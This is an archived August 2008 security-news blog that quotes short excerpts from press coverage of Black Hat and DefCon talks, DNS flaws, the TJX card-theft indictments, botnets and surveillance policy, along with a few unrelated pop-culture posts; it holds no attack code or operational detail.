Saturday, August 09, 2008

In Passing: Bernie Mac


Bernie Mac
October 5, 1957 – August 9, 2008


Friday, August 08, 2008

DEFCON: Massachusetts Agency Sues To Stop Presentation

Dan Goodin writes on The Register:

A transit agency in New England has filed a federal lawsuit to stop three Massachusetts Institute of Technology grad students from publicly presenting research at Defcon demonstrating gaping security holes in two of the agency's electronic payment systems.

The Massachusetts Bay Transit Authority (MBTA) also named MIT in the 17-page complaint, which seeks unspecified monetary damages for violation of the computer fraud and abuse act, negligent supervision and other causes of action. It also requests a temporary order preventing the students from "publicly stating or indicating that the security or integrity" of the MBTA's systems has been compromised.

More here.

Georgia, South Ossetia Conflict Spills Over to The Web




Sergei Shevchenko writes on the Threat Expert Blog:

According to the Russian media agency Interfax, the website of the Ministry of Internal Affairs of Georgia has been defaced it with a collage of the Georgian President Saakashvili and Adolf Hitler photos.

The hacker attack coincides with the war conflict that spilled over the region of South Ossetia.

Link.

FBI Says It Improperly Obtained Reporters’ Phone Records

Via The New York Times.

The Federal Bureau of Investigation said Friday that it had improperly obtained the phone records of reporters for The New York Times and The Washington Post in the newspapers’ Indonesia bureaus in 2004.

Robert S. Mueller III, director of the F.B.I., disclosed the episode in a phone call to Bill Keller, the executive editor of The Times, and apologized for it. He also spoke with Leonard Downie Jr., the executive editor of The Washington Post, to apologize.

F.B.I. officials said the incident came to light as part of the continuing review by the Justice Department inspector general’s office into the bureau’s improper collection of telephone records through “emergency” records demands issued to phone providers.

The records were apparently sought as part of a terrorism investigation, but the F.B.I. did not explain what was being investigated or why the reporters’ phone records were considered relevant.

More here.

UK Cabinet: Cyber Attacks By China And Russia Threaten To Bring Britain To A Grinding Halt

James Chapman writes in The Daily Mail:

Cyber attacks on Government computer systems and vital parts of the economy have become one of the greatest threats to national security, an official report disclosed yesterday.

The Government confirmed for the first time that a series of electronic assaults on official and private sector databases have already been carried out and are continuing.

Though the Cabinet Office report did not identify who carried out the 'well-resourced and sophisticated attacks', Whitehall sources disclosed that China is suspected of state-sponsored espionage.

Beijing has issued furious denials that it was engaged in such practices and the timing of yesterday's warning is particularly sensitive, coming on the opening day of the Olympics.

But intelligence officials fear there is clear evidence China is mounting an aggressive push to establish 'electronic dominance' over its global rivals.

More here.

Internet 'Security Patch' May Not Do the Job

John Markoff writes on The New York Times:

Faced with the discovery of a serious flaw in the Internet’s workings, computer network administrators around the world have been rushing to fix their systems with a cobbled-together patch. Now it appears that the patch has some gaping holes.

On Friday, a Russian physicist demonstrated that the emergency fix to the basic Internet address system, known as the Domain Name System, is vulnerable and will almost certainly be exploited by criminals.

The flaw could allow Internet traffic to be secretly redirected so thieves could, for example, hijack a bank’s Web address and collect customer passwords.

In a posting on his blog, the physicist, Evgeniy Polyakov, wrote that he had fooled the software that serves as the Internet’s telephone book into returning an incorrect address in just 10 hours, using two standard desktop computers and a high-speed network link. Internet experts who reviewed the posting said the approach appeared to be effective.

The basic vulnerability of the network has become a heated controversy since Dan Kaminsky, a Seattle-based researcher at the security firm IOActive, quietly notified a number of companies that distribute Internet addressing software earlier this year.

More here.

DEFCON: Hackers Mull Physical Attacks On A Networked World

An AP newswire article by Jordan Robertson, via SFGate.com, reports that:

Want to break into the computer network in an ultra-secure building? Ship a hacked iPhone there to a nonexistent employee and hope the device sits in the mailroom, scanning for nearby wireless connections.

How about stealing someone's computer passwords? Forget trying to fool the person into downloading a malicious program that logs keystrokes. A tiny microphone hidden near the keyboard could do the same thing, since each keystroke emits slightly different sounds that can be used to reconstruct the words the target is typing.

Hackers at the DefCon conference here were demonstrating these and other novel techniques for infiltrating facilities Friday.

Their talks served as a reminder of the danger of physical attacks as a way to breach hard-to-crack computer networks.

More here.

Toon of The Day: The War on Terror's Underlings


Click for larger image.

Via Truthdig.com.

Enjoy.

- ferg

Former U.S. Prosecutor: UFO Hack Looked Like Terrorist Attack

Sharon Gaudin writes on ComputerWorld:

After the computer network at the Naval Weapons Station Earle in New Jersey was breached and crashed just a few weeks after the terrorist attacks of Sept. 11, 2001, investigators thought it might be part of a larger al-Qaeda plot against the United States.

Investigators worked around the clock to figure out who had been in and out of the system that runs the weapons station for about five months, stealing passwords, installing remote access software, deleting data and ultimately shutting down the network of 300 computers for an entire week. That weeklong shutdown meant that for that period of time -- in the aftermath of attacks on the U.S. -- the station couldn't do its job of replenishing munitions and supplies to the Atlantic fleet.

Was the break-in organized by a nation-state? A terrorist group? After throwing critical resources at the probe when the government was already investigating not only the 9/11 attacks but the anthrax killings, investigators didn't track the breach to al-Qaeda. They tracked it to an unemployed system administrator in the U.K. -- Gary McKinnon, who was subsequently charged with hacking into 92 computer systems at the U.S. Army, the U.S. Air Force, the Department of Defense and NASA.

More here.

Irish Credit-Card Holders Hit By Online Theft

Via The Belfast Telegraph.

Irish banks are reportedly working to cancel hundreds of credit cards following a suspected online security breach.

Reports this morning say fraudsters are believed to have hacked into the database of one the country's leading retailers to steal the credit card details of its customers.

The theft was discovered on Wednesday night after the thieves tested stolen credit card details on a US website, spending a small amount to see if they would work.

Irish banks were informed that hundreds of their customers may be at risk of identity fraud as a result and they have contacted these customers to cancel their credit cards.

More here.

U.S. Man Who Spied For China Gets Nearly 16 Years

An AP newswire article by Matthew Barakat, via SFGate.com, reports that:

A New Orleans furniture salesman who spied for the People's Republic of China and helped the Beijing government obtain secret U.S. military information was sentenced Friday to nearly 16 years in prison.

The sentence for Tai Kuo, 58, was in line with what prosecutors had requested and more than twice as long as the term sought by defense lawyers.

"I have no one to blame but myself," Kuo told U.S. District Judge Leonie Brinkema at Friday's sentencing hearing. "I'm going to shoulder this remorse and guilt for the rest of my life."

Kuo, a native of Taiwan and a naturalized U.S. citizen, masqueraded as a Taiwanese agent when in fact he was working for the government in Beijing. He convinced a Pentagon analyst to give him classified information about U.S.-Taiwanese military relations.

More here.

Dutch Police Notify Botnet Victims

A Webwereld Netherlands article by Tom Sanders, via Computerworld UK, reports that:

Police in the Netherlands have claimed a world first after warning victims whose computers were infected by a botnet that was shut down last week. The victims will be forwarded to a special web page offering instructions on cleaning up their systems.

The high-tech crime unit of the police started issuing the warnings on Wednesday. Users with infected systems are automatically sent a special page when they log onto the internet. The page offers instructions on disabling the botnet, as well as a link to Kaspersky's online virus scanner and a request to file charges against the botnet herder, a 19- year-old man from the Dutch city of Sneek who was arrested last week.

The page, which was created in cooperation with Kaspersky Labs, marks the first time that botnet victims have been proactively warned by authorities, said Eddy Willems, a virus evangelist with Kaspersky Labs in the Netherlands.

More here.

2008 Pwnie Award Winners

Via The 2008 Pwnie Award Page.

  • Best Server-Side Bug: Ryan Smith and Alex Wheeler (Windows IGMP kernel vulnerability discovery)
  • Best Client-Side Bug: Nate McFeters, Rob Carter, and Billy Rios (Multiple URL protocol handling flaws)
  • Mass 0wnage: For the mass of Wordpress vulnerabilities found this past year (and anyone who found them)
  • Most Innovative Research: Cold Boot attacks on disk encryption keys (Princeton researchers)
  • Lamest Vendor Response: McAfee, for its reaction to the over 60 Websites classified as "Hacker Safe" by its ScanAlert service that were found to be XSS-vulnerable -- including the ScanAlert Website itself.
  • Most Overhyped Bug: Dan Kaminsky's Unspecified DNS cache poisoning vulnerability.
  • Best Song: "Packing the K!" Kaspersky Lab
  • Most Epic FAIL: Debian, for shipping a backdoored OpenSSL library for two years
  • Lifetime Achievement Award: Tim Newsham

More here.

Thursday, August 07, 2008

Picture of The Day: Brett Favre is Now a Jet



And yes, I'm a big NY Jets fan.

Awesome. :-)

- ferg

Image source: NBC Sports

The Mysterious Unidentified Retailer In The TJX Indictments

Evan Schuman writes on StorefrontBacktalk:

The feds were certainly not shy about naming retail victims in the 41 million payment card heist, listing in one of the indictments TJX, BJ's Wholesale Club, OfficeMax, Boston Market, Barnes & Noble, Sports Authority, DSW and Forever 21.

But the mystery retailer had several differences from the other retailers. First, this retailer was the only one whose perimeter security systems detected the mouse-toting bandits, although it did so only after the binary bullies had grabbed some card numbers, including some ATM PINs.

Therein may lie the reason for this retailer's mask. On the one hand, this Fortune 500 merchant is an unsung hero in breaking this case. Not coincidentally, that chain was the final one the defendants wirelessly hacked into through a Florida wireless access point. Blocked of their last system in mid-October 2007, one of the two men charged with attempting that final cyber thievery today faces life in prison, if convicted of all charges.

More here.

Black Hat: Typosquatting the Presidential Election Websites

Dean Takahashi writes on VentureBeat:

Bad hackers haven’t caused much damage this year during the online-heavy presidential campaign. But the potential is there. Consider “typosquatting.”

There are about 160 different ways to type in the wrong web site for www.barackobama.com. Oliver Friedrichs, former director of research at Symantec, knows this because he did a study of the sites that typo squat, or exploit users’ misspellings of web site names to siphon off traffic from the official candidate’s web site for a variety of commercial or corrupt purposes.

At Black Hat today, Friedrichs described the typosquatting study as part of a broader talk offering a warning about how any big election could be threatened by a variety of different cyber attacks.

More here.

Reporters Without Borders Make Pirate Broadcast in Beijing

Jane Macartney writes in The Times Online:

The world’s best-known advocate of freedom of the media took its message to the heart of Beijing this morning, making a pirate broadcast on Chinese radio exactly 12 hours to the minute before the start of the Olympics opening ceremony.

Paris-based Reporters Without Borders began broadcasting on local FM radio to several districts of Beijing at 8.08 a.m local time (0000 GMT), denouncing China’s grip on media and expression. The broadcast, in both English and Mandarin Chinese, while often indistinct, lasted for 20 minutes.

In the latest embarrassing breach of China’s massive security operation, the group used the FM 104.4 frequency to demand the release of political prisoners and the lifting of censorship. A voice at the start of the broadcast said: “China is the country of censorship, and this programme is our way of making fun of the Chinese authorities who still keep hundreds of journalists and Internet users in prison."

More here.

Black Hat: 'Windows Jingle Attack' Exposed

Thomas Claburn writes on InformationWeek:

At the Black Hat conference in Las Vegas on Thursday, Eric Filiol, the head scientist at the French Signals Academy's Virology and Cryptology Lab, explained how to steal data from a computer without a network connection.

Filiol demonstrated what he called the Windows Jingle Attack, a method for encoding a user's password into audio data and concealing that data into the Windows start-up tone, a publicly audible sound that can be read from afar with a local or remote microphone and then decoded.

The Windows Jingle Attack requires a malware on the target machine, so that in that respect it's not as easy to execute as other attacks that allow remote code execution. Nonetheless, there are certain scenarios when being able to obtain data from a computer without a network connection would be valuable.

There's precedent for related attacks in the intelligence community. In 1987, the NSA found that the KGB had replaced the circuit boards and power cords in the U.S. Embassy in Moscow in order to covertly siphon message data.

More here.

American Deaths in Afghanistan War Reach 500


An AP newswire article by Jason Straziuso, via The Boston Globe, reports that:

The deadliest three months for American forces in Afghanistan have pushed the U.S. death toll to at least 500, forcing a war long overshadowed by Iraq back into the headlines.

Larger, more sophisticated militant attacks have also caused a sharp rise in Afghan civilian deaths -- at least 472 in the first seven months of the year, most in suicide bombings, according to an Associated Press count.

There are about 33,000 U.S. troops in Afghanistan, the highest since the war began, meaning more troops than ever are patrolling this country's mountainous terrain and exposed to ambushes and roadside bombs.

The U.S. military suffered 65 deaths in May, June and July, by far the deadliest three-month period in Afghanistan since the war began in 2001. The previous deadliest three-month period was in the spring of 2005, with 45 U.S. deaths.

More here.


'How I Got Hacked at Black Hat'

Brian Prince writes on eWeek:

So as some of you may have already read by now, one of our brilliant cyber-minds at eWEEK who will remain nameless (Brian Prince…oh wait…damn!) entered one of his passwords in the clear and had it intercepted at this year’s Black Hat conference.

Alas, I broke one of the cardinal rules of security and, but for the grace of the Black Hat conference staff, would have had my name added to the infamous Wall of Sheep.

Here’s the back story: a group of journalists representing Global Security Mag, one of the media sponsors of the event, decided it would be a good idea to see if they could catch some of their fellow journalists insecurely accessing the Web via the local area network (LAN) in the conference pressrooms.

More here.

Note: Robert Vamosi also has some additional details on this over at C|Net News here.

Mark Fiore: The All New EPA



More Mark Fiore brilliance.

Via The San Francisco Chronicle.

Enjoy!

- ferg

Black Hat: Hackers: Uncle Sam Wants You

Sean Michael Kerner writes on internetnews.com:

The U.S. government is actively engaged in the fight to help protect against Internet threats and cybercrime. And speaking before a packed ballroom here at the Black Hat security conference, they made it clear they want hackers to join the effort.

"The reason why we come here is we hope to attract folks to government service," said James Finch, assistant director of the FBI's cyber division. "And if we can't get you in service, then we want partnerships on working on security issues."

Those issues brought a handful of representatives from U.S. government agencies -- including the Department of Homeland Security's U.S. Computer Emergency Readiness Team (US-CERT), the FBI, NASA, the National Security Agency, the Naval Criminal Investigative Service, the Internal Revenue Service and the U.S. Air Force -- to speak to hackers and security experts here at Black Hat.

More here.

Black Hat: Windows Vista Security 'Rendered Useless' by Researchers

Dennis Fisher writes on SearchSecurity:

Two security researchers have developed a new technique that essentially bypasses all of the memory protection safeguards in the Windows Vista operating system, an advance that many in the security community say will have far-reaching implications not only for Microsoft, but also on how the entire technology industry thinks about attacks.

In a presentation at the Black Hat briefings, Mark Dowd of IBM Internet Security Systems (ISS) and Alexander Sotirov, of VMware Inc. will discuss the new methods they've found to get around Vista protections such as Address Space Layout Randomization(ASLR), Data Execution Prevention (DEP) and others by using Java, ActiveX controls and .NET objects to load arbitrary content into Web browsers.

By taking advantage of the way that browsers, specifically Internet Explorer, handle active scripting and .NET objects, the pair have been able to load essentially whatever content they want into a location of their choice on a user's machine.

More here.

Feingold: Chertoff Misleads on Laptop Searches

Senator Russ Feingold (D-Wisconsin)

Ryan Singel writes on Threat Level:

Democratic Sen. Russ Feingold opposes border agents searching through Americans' laptops without cause, and he doesn't like how Homeland Security Chief Michael Chertoff articulated the government's current policy in an interview with Threat Level on Monday.

In that conversation, Chertoff said that in practice, border agents rely on a real suspicion to decide whose laptop to look into or even seize, but that he opposes creating a legal standard for searching Americans' electronics at the border since it would just lead to too much litigation.

Feingold, an outspoken civil libertarian -- the only senator to vote against the Patriot Act -- begs to differ.

More here.

Favre Jets Jersey Blitz Crashes Team's Web Store

Paul McDougall writes on InformationWeek:

The New York Jets' online store was offline for parts of Thursday as fans rushed to be among the first to purchase a jersey bearing quarterback Brett Favre's famously difficult-to-pronounce last name and No. 4 player number.

Demand for the jerseys was such that JetShop.com was either offline completely, or had slowed to a crawl, for much of the day.

The site, when available, showed the Favre jerseys for sale at $80, but it warned customers "to allow extra time, regardless of shipping method," to receive their order.

Jets fans desperate to own an emerald-and-white team sweater bearing the Mississippi native's credentials had other, more expensive, Internet options. Favre Jets jerseys were selling on eBay Thursday for as much as $300.

The Jets aren't the first organization to be caught napping by a sudden spike in Web traffic and likely won't be the last.

More here.

Black Hat: New U.S. Cyber Defense Coordinator Hints at Plans

An AP newswire article by Jordan Robertson, via SFGate.com, reports that:

One of the United States' biggest challenges in securing government computers from foreign attacks isn't necessarily technical. The country first needs to figure out how much those networks are worth and how much the U.S. should spend on protecting them, the new Homeland Security official in charge of that effort said Thursday.

Rod Beckstrom, director of the newly created National Cyber Security Center, an agency responsible for protecting the government's computer networks, was making his first major address to the computer security community. He steered clear of specifics in his hourlong talk at the Black Hat hacker convention, because he said the agency is still developing its plans.

More here.

Patch Tuesday: Microsoft Will Patch 12 Vulnerabilities

Ryan Naraine writes on the ZDNet "Zero Day" Blog:

Next Tuesday (August 12th), Microsoft will ship 12 security bulletins with fixes for serious vulnerabilities in a wide range of of widely deployed products.

Seven of the 12 bulletins will be rated “critical,” Microsoft’s highest severity rating.

The critical bulletins will cover remotely exploitable flaws in Internet Explorer, Windows Media Player, MS Excel, MS PowerPoint, MS Access, MS Office and the Windows operating system.

The other five will carry an “important” rating and will include patches for bugs in Windows, Outlook Express, Windows Mail, Windows Messenger and Microsoft Word.

More here.

SQL Attacks Inject Government Sites in U.S., UK

Dan Goodin writes on The Register:

A new round of SQL injection attacks has infected millions of web pages belonging to businesses and government agencies, including those that belong to the National Institutes of Health and Education Department in the US and the UK Trade & Investment.

This search shows at least 1.45 million infected pages and queries here and here out some of the US and UK government websites that have been hit by the attack. Not exactly reassuring to know that government-run websites are open to such a basic attack.

We strongly recommend not clicking on the infected sites unless you know what you're doing. Punters unfortunate to land on infected pages that are still live can wind up at sites "where a CGI script starts the road of pain," according to this post from SANS.

More here.

UK Government Pays Telcos £18.5M For Records Retention

Via OUT-LAW.com.

The Government has paid £18.5 million over five years to telecoms firms for access to data about citizens' use of phones and the internet. The figures took a sharp upturn in 2006 and last year reached £8.3 million.

In 2003 Parliament agreed a code of practice for the retention of communications data by the telecoms industry. The Anti-terrorism, Crime and Security Act (ATCSA) of 2001 and the EU's 2007 Data Retention Directive both made it possible for the Government to pay grants to service providers to cover the cost of keeping that data though they did not demand payment.

Security minister Admiral Lord West has released information about the amounts the Government has paid in grants to telcoms firms for keeping that data.

In 2007 10 grants were made totalling £8.3 million. In the first year of the scheme, 2004, four grants were made which accounted for just £84,582 in total. In the first seven months of this year £4.1 million was paid out in five grants.

More here.

Wednesday, August 06, 2008

Secret EU Security Draft Gives U.S. Access to Personal Data

Ian Traynor writes in The Guardian:

Europe should consider sharing vast amounts of intelligence and information on its citizens with the US to establish a "Euro-Atlantic area of cooperation" to combat terrorism, according to a high-level confidential report on future security.

The 27 members of the EU should also pool intelligence on terrorism, develop joint video-surveillance and unmanned drone aircraft, start networks of anti-terrorism centres, and boost the role and powers of an intelligence-coordinating body in Brussels, said senior officials.

The 53-page report drafted by the Future Group of interior and justice ministers from six EU member states - Germany, France, Sweden, Portugal, Slovenia, and the Czech Republic -argues Europe will need to integrate much of its policing, intelligence-gathering, and policy-making if it is to tackle terrorism, organised crime, and legal and illegal immigration.

The report, seen by the Guardian, was submitted to EU governments last month following 18 months of work. The group, which also includes senior officials from the European Commission, was established by Germany last year and charged with drafting a blueprint for security and justice policy over the next five years.

More here.

UK: 'Fakeproof' e-Passport is Cloned in Minutes

Steve Boggan writes in The Times Online:

New microchipped passports designed to be foolproof against identity theft can be cloned and manipulated in minutes and accepted as genuine by the computer software recommended for use at international airports.

Tests for The Times exposed security flaws in the microchips introduced to protect against terrorism and organised crime. The flaws also undermine claims that 3,000 blank passports stolen last week were worthless because they could not be forged.

In the tests, a computer researcher cloned the chips on two British passports and implanted digital images of Osama bin Laden and a suicide bomber. The altered chips were then passed as genuine by passport reader software used by the UN agency that sets standards for e-passports.

More here.

ID Thefts at England Air Force Bases Total $70,000

Geoff Ziezulewicz writes in The Stars and Stripes (European Edition):

Thieves spent $650 on a shopping spree at Bloomingdale's in New York City and more than $1,100 at various Canadian businesses in just two cases of identity theft reported in the past month within Air Force communities in England.

Sixty-six victims reported losses totaling $37,917 at RAF Lakenheath from July 5 to Aug. 5.

Victimsf bank accounts were hacked and duplicate debit cards were created to make purchases all over North America, from Canada to Mexico and throughout the States, according to statistics provided by Lakenheathfs 48th Security Forces Squadron.

Approximately 150 identity theft incidents totaling about $70,000 were reported within the RAF Mildenhall and Lakenheath communities in the past month, according to Air Force investigators.

More here.

Hat-tip: Pogo Was Right

Black Hat: Kaminsky: Many Ways to Attack DNS

Robert McMillan writes on ComputerWorld:

There were 6 a.m. calls from Finnish certificate authorities and also some pretty harsh words from his peers in the security community -- even an accidentally leaked Black Hat presentation. But after managing the response to one of the most highly publicized Internet flaws in recent memory, Dan Kaminsky said Wednesday that he'd do it all over again.

Kaminsky's full-time job over the past few months has been working with software vendors and Internet companies to fix a widespread flaw in the DNS (domain name system) used by computers to find each other on the Internet. Kaminsky, in conjunction with an assortment of pre-alerted tech vendors and experts, first disclosed the problem on July 8, warning corporate users and Internet service providers to patch their software as quickly as possible.

On Wednesday, he disclosed more details of the issue during a crowded session at the Black Hat conference, describing a dizzying array of attacks that could exploit DNS. Kaminsky also talked about some of the work he'd done to fix critical Internet services that could also be hit with this attack.

More here.

Black Hat: 500G of Personal Data Captured by CoreFlood Botnet

William Jackson writes on GCN.com:

A cache of stolen data gathered from a botnet that has been quietly sweeping up information for years contained the user names and passwords for:

  • 8,485 bank accounts
  • 3,233 credit card accounts
  • 151,000 e-mail accounts
  • 58,391 social networking site accounts
  • 4,237 online retailer accounts
  • 416 stock trading accounts
  • 869 payment processor accounts
  • 413 mortgage accounts
  • 422 finance company accounts


The Coreflood Trojan responsible for the infections has been around in one form or another since 2002, said Joe Stewart, director of malware research for SecureWorks Inc. The botnet is being used by a Russian crime group on whose command and control server Stewart found the stolen information. The data, which amounts to nearly 500 gigabytes, represents only six months of operations.

“They had erased the previous directories, probably because they didn’t have room to keep it,” Stewart said.

He estimated the group has stolen four times that amount of data, giving them access to accounts worth millions.

Stewart shared some of his research on Coreflood Wednesday at the Black Hat Briefings security conference. Because the Trojan has been circulating largely under the radar and spreads throughout an organization using a network administrator’s privileges, it can be particularly insidious, he said.

More here.

UK Questioned on Phorm

Via The BBC.

The UK government has until the end of August to respond to a letter from the European Union about a controversial system which monitors web traffic.

EU commissioner Viviane Reding has asked the UK government to clarify whether the Phorm system is in breach of European data laws.

Phorm tracks users' web habits in order to better target ads at them and three UK ISPs are so far signed up to it.

BT is due to begin a widescale trial of the service imminently.

More here.

Black Hat: EFF Launches Coders' Rights Website

John Timmer writes on ARS Technica:

The Electronic Frontier Foundation is using the Black Hat USA conference, taking place in Las Vegas, to launch a site designed to help security researchers navigate the treacherous legal waters they face when exploring the vulnerabilities in commercial software. The EFF will be making lawyers available at its booth on the conference floor, but the long-term aid will come in the form of a Coders' Rights web site that aggregates relevant legal information from elsewhere on the EFF site. Although the site is information-rich, it's not meant as a standalone resource: the phrase "talk to a lawyer" appears throughout its content.

The project is being spearheaded by the EFF's Civil Liberties director Jennifer Granick. "Coders who explore technology through innovation and research play a vital role in developing and securing the software and hardware we use everyday," she stated in announcing the site. "Yet this important work can be stymied by bogus legal threats."

More here.

Tuesday, August 05, 2008

Black Hat: Why It Is Probably Overrated


So you've probably heard me mention previously that I won't be in Vegas for Black Hat or DefCon this year -- and here's why: Yawn.

First: I hate Vegas.

Second: I will know everything the attendees know, on the same day, in the same detail, and without attending. And probably in more detail -- because most attendees are afraid to actually network because of roaming threats. But that's another issue altogether. Plus, I actually know most of these guys anyways. :-)

Third: The attendees at Black Hat and DefCon just aren't in my professional "social circle", but aside from that, there's just not real "fun factor" there for me. Blah.

Fourth: It's a great boondoggle, but I just really didn't feel like attending this year. The crowds will be larger, the "Lulz" factor will be higher. No thanks.

But for those attending: Have fun! Have a couple of tequila shooters for me. :-)

I'll be back here battling cyber thieves and others menaces. As usual.

- ferg

U.S. Military Study Looked to Rome for Lessons


Noah Shachtman writes on Danger Room:

The Pentagon's legendary Office of Net Assessment is known for peering into the future of conflict [.pdf] -- at subjects like wartime biotech, fighting robots, networked battles, and the military in space. The office's head, Andrew Marshall, has been called the Pentagon's "futurist-in-chief." But for one study, concluded in 2002, Net Assessment-funded researchers looked back, to the empires of Alexander the Great, Imperial Rome, Genghis Khan, and Napoleonic France.

The study, "Military Advantage in History,"[.pdf] examines these "pivotal hegemonic powers" to draw lessons about how the United States "should think about maintaining military advantage in the 21st century." Mother Jones' Justin Elliott obtained the report through the Freedom of Information Act.

Much of the report reads like a fairly standard military history -- not unlike Max Boot's War Made New. However, "in an extraordinary passage, the study cites the Roman experience — from over a millennium ago — as a precedent for America's long-term dominance," Elliott notes.

More here.

E-Mail Hacking Case Could Redefine Online Privacy

Ellen Nakashima writes in The Washington Post:

A federal appeals court in California is reviewing a lower court's definition of "interception" in the digital age, in a case that some legal experts say could weaken consumer privacy protections online.

The case, Bunnell v. Motion Picture Association of America, involves a hacker who in 2005 broke into a file-sharing company's server and obtained copies of company e-mails as they were being transmitted. He then e-mailed 34 pages of the documents to an MPAA executive, who paid the hacker $15,000 for the job, according to court documents.

The issue boils down to the judicial definition of an intercept in the electronic age, in which packets of data move from server to server, alighting for milliseconds before speeding onward. The ruling applies only to the 9th District, which includes California and other Western states, but could influence other courts around the country.

More here.

USAF Takes Control of First SBIRS Satellite

Martin Seiff writes for UPI:

The U.S. Air Force has taken over control of the first Space Based Infrared System -- SBIRS -- orbiting missile launch detection system.

Lockheed Martin, whose Space Systems Co. is the prime contractor on the SBIRS project, announced in a statement Tuesday it had completed the transfer of payload and ground system operations of the first SBIRS Highly Elliptical Orbit -- HEO-1 -- satellite to the U.S. Air Force in preparation. What Lockheed Martin described as "certified operations" is scheduled to begin before the end of 2008.

The SBIRS system is the next generation of intelligence, surveillance and reconnaissance -- ISR -- for ballistic missile defense in space. It is planned to give the earliest possible alert of any potentially hostile ballistic missile launches around the world and to fulfill other space-based technical intelligence and battle-space surveillance functions.

The HEO-1 was fired into orbit in November 2006, and Lockheed Martin said it has since "been exceeding performance specifications during an extensive on-orbit test regimen" before being turned over to the U.S. Air Force for active service.

More here.

Russian Gang Hijacking PCs in Vast Scheme

John Markoff writes in The New York Times:

A criminal gang is using software tools normally reserved for computer network administrators to infect thousands of PCs in corporate and government networks with programs that steal passwords and other information, a security researcher has found.

The new form of attack indicates that little progress has been made in defusing the threat of botnets, networks of infected computers that criminals use to send spam, steal passwords and do other forms of damage, according to computer security investigators.

Several security experts say that although attacks against network administrators are not new, the systematic use of administrative software to spread malicious software has not been widely seen until now.

The gang was identified publicly in May by Joe Stewart, director of malware research at SecureWorks, a computer security firm in Atlanta. Mr. Stewart, who has determined that the gang is based in Russia, was able to locate a central program controlling as many as 100,000 infected computers across the Internet. The program was running at a commercial Internet hosting computer center in Wisconsin.

Mr. Stewart alerted a federal law enforcement agency that he declined to identify, and he said that it was investigating the matter. Although the original command program was shut down, the gang immediately reconstituted the system, he said, moving the control program to another computer in the Ukraine, beyond the reach of law enforcement in the United States.

More here.

Pentagon Shuts Down CIFA

Via Nukes & Spooks.


With every day that goes by, it seems, another piece of the edifice that Don Rumsfeld erected at the Pentagon is dismantled.

Today comes the news, not unexpected, that Defense Secretary Robert Gates has shuttered--the official euphemism is "disestablished"--the Counterintelligence Field Activity, or CIFA.

CIFA was widely criticized for gathering data on anti-war protesters, allegedly because they represented a threat to military bases and facilities, under a program known as Talon. The agency was the brainchild of Rumsfeld aides Stephen Cambone and Paul Wolfowitz. (Our colleague Walter Pincus of the Washington Post did a lot of the groundbreaking reporting on this issue).

The Talon database, itself shut down last year, had about 13,000 entries, including nearly 3,000 reports on U.S. citizens.

More here.

Hat-tip: Danger Room

California Controller: State Computers Can't Handle Pay Cut

Kevin Yamamura writes in The Sacramento Bee:

If Gov. Arnold Schwarzenegger wants to issue minimum-wage checks to 200,000 state workers in less than a month, he may want to rehire any semi-retired computer programmers he terminated last week.

The massive pay cut would exhaust the state's antiquated payroll system, which is built on a Vietnam-era computer language so outdated that many college students don't even bother to learn it anymore.

Democratic state Controller John Chiang said Monday it would take at least six months to reconfigure the state's payroll system to issue blanket checks at the federal minimum wage of $6.55 per hour, though Schwarzenegger insists such a change should occur this month.

Experts say Chiang isn't joking when he describes the state's payroll system as a computing relic on par with vacuum tubes and floppy disks.

More here.

Meet A-Z: The Computer Hacker Behind a Cyber Crime Wave

Byron Acohido writes on USA Today:

He goes by the nickname A-Z and is one of Russia's bright young tech stars. He's a crack programmer, successful entrepreneur and creator of sophisticated software tools that help his customers make millions.

Trouble is, A-Z's masterstroke is a computer program called ZeuS that helps cybergangs steal people's identity data and pull off Web scams on a vast scale. Last fall, German criminals used ZeuS to pull off an Ocean's Eleven-like caper, hijacking $6 million from banks in the United States, United Kingdom, Spain and Italy, says SecureWorks, an Atlanta-based company that monitors Internet crime and supplies security systems for 2,100 companies and government agencies.

A few years ago, skilled hackers such as A-Z concentrated most of their efforts on setting loose globe-spanning Internet viruses, mainly for bragging rights. But cybercrime is now a fast-expanding, global industry, security researchers and law enforcement officials say. Because it most often goes undetected and unreported, cybercrime is difficult to measure. A benchmark widely cited by the tech-security community is that its value tops $100 billion a year, outpacing global drug trafficking.

More here.

U.S. Dept. of Justice Charges 11 in Theft of 40 Million Card Numbers

A Reuters newswire article, via The New York Times, reports that:

The Justice Department said on Tuesday that it had charged 11 people in the theft of tens of millions of credit and debit card numbers of customers shopping at major retailers, including TJX Companies, in one of the largest reported identity-theft incidents on record.

The United States Attorney in Boston said those charged were involved in the theft of more than 40 million credit and debit card numbers.

TJX, of Framingham, Mass., which owns the Marshall’s and TJ Maxx chains, was the hardest hit by the ring, acknowledging in March 2007 that information from 45.7 million credit cards was stolen from its computers.

The charges focus on three people from the United States, three from the Ukraine, two from China, one from Estonia and one from Belarus.

The authorities said that the scheme was spearheaded by a Miami man named Albert Gonzalez, who hacked into the computer systems of retailers including TJX, BJ’s Wholesale Club, OfficeMax, Boston Market, Barnes & Noble, Sports Authority, Forever 21 and DSW Inc. The numbers were then stored on computer servers in the United States and Eastern Europe.

They then sold the information to people in the United States and Europe, who used it to withdraw tens of thousands of dollars at a time from automated teller machines, the authorities said.

More here.

Security Fix: Microsoft to Open Kimono on Security Patches

Brian Krebs writes on Security Fix:

In a bid to help the security industry stay a step ahead of cyber crooks, Microsoft will release additional details behind the vulnerabilities it patches each month to anti-virus companies and other large vendors of Windows security software.

While Microsoft already provides a brief fact sheet of which components of Windows will be fixed prior to its regular patch releases on the second Tuesday of each month, known as "Patch Tuesday," security vendors say additional details will help them more swiftly update their software to detect the latest attacks.

In particular, software companies rarely have enough time to develop attack "signatures," snippets of code or Internet traffic, that when found on a network or PC could indicate an attacker is trying to leverage the flaws.

Under a new program starting with October's Patch Tuesday cycle, Microsoft will begin releasing technical details that should allow security vendors to very quickly develop those signatures and gain a head start before the crooks learn to exploit the vulnerabilities.

More here.

Monday, August 04, 2008

Retarded Quote of The Day: Steven Brill

"We don't believe the security or privacy of these would-be members will be compromised in any way."

- Steven Brill, CEO of Verified Identity Pass, who was quoted in a Bloomberg News article regard the theft of a laptop at the San Francisco International Airport containing the confidential information of 33,000 people on the U.S. Customs CLEAR program. Simply astounding.

Beware the Hype: Black Hat 2008

Robert Vamosi writes on C|Net News:

Black Hat 2008 is bigger, and some might say better. Occupying most of the third and fourth floors of the convention hall at Caesar's Palace, the conference started on Saturday with two and four day training sessions which continue through Tuesday.

The "public" part of Black Hat runs Wednesday and Thursday and features speakers in 15 separate tracks. One of the tracks will consist of Turbo talks of 20 minute each. After there will an opportunity for the audience to talk with some of the speakers in a another room.

More here.

